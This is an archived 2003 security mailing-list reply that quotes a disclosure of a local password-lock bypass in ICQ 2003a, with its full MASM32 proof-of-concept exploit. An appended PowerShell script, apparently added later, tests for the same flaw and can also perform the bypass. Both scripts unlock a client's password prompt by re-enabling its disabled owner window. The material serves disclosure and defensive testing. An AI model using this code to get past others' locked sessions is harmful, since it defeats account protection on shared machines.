Open Source and information security mailing list archives
Message-ID: <20030708094332.E20254@road.demos.su>
Date: Tue, 8 Jul 2003 09:49:29 +0400 (MSD)
From: Seva Gluschenko <gvs@...os.net>
To: Cauê Moura Prado <mouraprado@...oguerra.com.br>
Subject: Re: ICQ 2003a Password Bypass


Message of Cauê Moura Prado at Jul 5 13:30 ...

CMP> Software: ICQ 2003a
CMP> Threat: Login password can be bypassed locally

I may have missed something, but does it mean that ICQ 2003a and the other
mentioned versions cache the registered user's password regardless of the
user's intention, or that you guys just run your "exploit" right after a
valid user's session, so that the status might be changed back to online
just before the connection timeout is exceeded? I suppose the latter.

As a matter of fact, it can still be considered an exploit, but the timing
limitations must be documented properly. It's hard to believe you can
start an ICQ session without having the UIN's password, because the server
will just refuse to authorize that.

And, I'm afraid to ask, you notified vendors before releasing the
thing, didn't you?

CMP> I have found a vulnerability in ICQ Pro 2003a that
CMP> allows anyone to connect to the ICQ server using any
CMP> account registered locally, regardless of whether the
CMP> 'save password' option is checked or not. The high level
CMP> security password is also bypassed!
CMP>
CMP> How does it work?
CMP> Simple! You may use EnableWindow API to enable ICQ
CMP> contact list window. After enabling the window you can
CMP> set your status to online and the UIN will be
CMP> connected no matter how high is your security level.
CMP>
CMP> I've coded a proof-of-concept exploit on July 2nd, when
CMP> I found the vuln.
CMP> The exploit is provided "As is" without warranties.
CMP> To compile it you will need MASM32.
CMP>
CMP> ; =========================================================================
CMP> ;         CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF
CMP> ; -------------------------------------------------------------------------
CMP> ;
CMP> ;  07/02/2003 - ca1-icq.asm
CMP> ;  ICQ Password Bypass exploit.
CMP> ;  written by Cauê Moura Prado (aka ca1)
CMP> ;  mouraprado@...oguerra.com.br - ICQ 373313
CMP> ;
CMP> ;  This exploit allows you to login to the ICQ server using any account registered *locally*,
CMP> ;  no matter whether the 'save password' option is checked or not. High level security is also bypassed.
CMP> ;  All you have to do is run the exploit and set the status property using your mouse when the flower
CMP> ;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
CMP> ;  the exploit again. Greets to: Alex Demchenko (aka Coban), my cousin Rhenan for testing the exploit
CMP> ;  on his machine and that tiny Israeli company for starting the whole thing. Oh sure.. hehehe
CMP> ;  I can't forget...  many kisses to those 3 chicks from my building for being so hot!! ;)
CMP> ;
CMP> ;
CMP> ;        uh-oh!
CMP> ;         ___
CMP> ;      __/   \__
CMP> ;     /  \___/  \        Vulnerable:
CMP> ;     \__/+ +\__/          ICQ Pro 2003a Build #3800
CMP> ;     /   ~~~   \
CMP> ;     \__/   \__/        Not Vulnerable:
CMP> ;        \___/             ICQ Lite alpha Build 1211
CMP> ;                          ICQ 2001b and ICQ 2002a
CMP> ;    tHe Flaw Power        All other versions were not tested.
CMP> ;
CMP> ;                          coded with masm32
CMP> ;
CMP> ; _______________________________________________________________________exploit born in .br
CMP>
CMP> .386
CMP> .model flat, stdcall
CMP> option casemap:none
CMP> include \masm32\include\user32.inc
CMP> include \masm32\include\kernel32.inc
CMP> includelib \masm32\lib\user32.lib
CMP> includelib \masm32\lib\kernel32.lib
CMP> .data
CMP> szTextHigh byte 'Password Verification', 0   ; title of the high-security password prompt
CMP> szTextLow byte 'Login to server', 0          ; title of the ordinary login prompt
CMP> szClassName byte '#32770', 0                 ; standard Win32 dialog box class
CMP> .data?
CMP> hWndLogin dword ?
CMP> .code
CMP> _entrypoint:
CMP>  ; look for the high-security prompt first, then for the ordinary login prompt
CMP>  invoke FindWindow, addr szClassName, addr szTextHigh
CMP>  mov hWndLogin, eax
CMP>  .if hWndLogin == 0
CMP>    invoke FindWindow, addr szClassName, addr szTextLow
CMP>    mov hWndLogin, eax
CMP>  .endif
CMP>  ; for a top-level dialog GetParent returns its owner: the contact list
CMP>  ; window that the modal prompt disabled
CMP>  invoke GetParent, hWndLogin
CMP>  invoke EnableWindow, eax, 1      ; enable ICQ contact list
CMP>  invoke ShowWindow, hWndLogin, 0  ; SW_HIDE: get rid of the login screen (don't kill this window)
CMP>  invoke ExitProcess, 0            ; uhuu.. cya! i gotta sleep!
CMP> end _entrypoint
CMP>
CMP> ; =========================================================================
CMP> ;         CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF
CMP> ; -------------------------------------------------------------------------
CMP>

SY, Seva Gluschenko, just stranger on The Road.
Demos-Internet NOC	| GVS-RIPE | GVS3-RIPN
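Added example, not part of the original thread and not code from ca1 or from ICQ: a PowerShell script for the Windows box on which the client runs that checks the property the exploit depends on, namely that the password prompt "locks" the client only by disabling its owner window (Win32 modality). It looks for the dialog, reports whether the owner is disabled, and with -Bypass performs the same two calls as ca1-icq.asm (re-enable the owner, hide the dialog). The default titles and the '#32770' class are taken from the post; the -Bypass switch and the use of GetWindow(GW_OWNER) in place of GetParent are my own choices (for a top-level dialog both return the owner).

```powershell
<#
  Added example (not from the original post or from ICQ): test whether a
  password prompt relies solely on disabling its owner window. Run as the
  logged-on user while the client is already running. Exit codes:
    0 = owner not disabled (prompt does not depend on window state)
    1 = owner disabled (the EnableWindow bypass applies)
    2 = no matching dialog / no owner, nothing to test
#>
param(
    # Titles of the password prompts to look for; defaults are the two
    # titles ca1-icq.asm searches for. Pass your own for another program.
    [string[]]$DialogTitles = @('Password Verification', 'Login to server'),
    # '#32770' is the standard Win32 dialog box class.
    [string]$ClassName = '#32770',
    # Only re-enable the owner and hide the dialog when explicitly asked.
    [switch]$Bypass
)

Add-Type -Namespace Win32 -Name User32 -MemberDefinition @'
[DllImport("user32.dll", EntryPoint = "FindWindowW", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);

[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr GetWindow(IntPtr hWnd, uint uCmd);

[DllImport("user32.dll")]
public static extern bool IsWindowEnabled(IntPtr hWnd);

[DllImport("user32.dll")]
public static extern bool EnableWindow(IntPtr hWnd, bool bEnable);

[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

[DllImport("user32.dll", EntryPoint = "GetWindowTextW", CharSet = CharSet.Unicode)]
public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder lpString, int nMaxCount);
'@

$GW_OWNER = 4   # GetWindow: owner of a top-level window
$SW_HIDE  = 0   # ShowWindow: hide without destroying

# Locate the first open prompt with one of the expected titles.
$hDialog    = [IntPtr]::Zero
$foundTitle = $null
foreach ($title in $DialogTitles) {
    $hDialog = [Win32.User32]::FindWindow($ClassName, $title)
    if ($hDialog -ne [IntPtr]::Zero) { $foundTitle = $title; break }
}
if ($hDialog -eq [IntPtr]::Zero) {
    Write-Host "No dialog of class $ClassName with a matching title is open; nothing to test."
    exit 2
}

# ca1-icq.asm uses GetParent; for a top-level dialog that returns the owner,
# which GetWindow(GW_OWNER) asks for explicitly.
$hOwner = [Win32.User32]::GetWindow($hDialog, $GW_OWNER)
if ($hOwner -eq [IntPtr]::Zero) {
    Write-Host "Dialog '$foundTitle' has no owner window; the EnableWindow trick does not apply."
    exit 2
}

$sb = New-Object System.Text.StringBuilder 256
[void][Win32.User32]::GetWindowText($hOwner, $sb, $sb.Capacity)
$ownerEnabled = [Win32.User32]::IsWindowEnabled($hOwner)
Write-Host ("Dialog '{0}' is owned by '{1}' (enabled={2})" -f $foundTitle, $sb.ToString(), $ownerEnabled)

if ($ownerEnabled) {
    Write-Host "Owner is not disabled; this prompt does not rely on Win32 modality."
    exit 0
}
Write-Host "Owner is disabled: the lock is enforced only by window state, which any process in this session can undo."

if ($Bypass) {
    # The same two calls ca1-icq.asm makes: re-enable the owner, hide (do not close) the prompt.
    [void][Win32.User32]::EnableWindow($hOwner, $true)
    [void][Win32.User32]::ShowWindow($hDialog, $SW_HIDE)
    Write-Host "Owner re-enabled and dialog hidden; the owner window now accepts input again."
}
exit 1
```

Two caveats follow from the thread. First, Seva's point holds for this script too: it bypasses nothing on the server side, it only unlocks a client that already holds an authenticated session, so it is only meaningful while that session is alive. Second, the robust design the check is looking for is a client that keeps its locked state in application logic (for example, refusing status changes and other commands until credentials have been re-verified) rather than in the enabled/disabled state of a window that any process in the same desktop session can flip back with EnableWindow.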

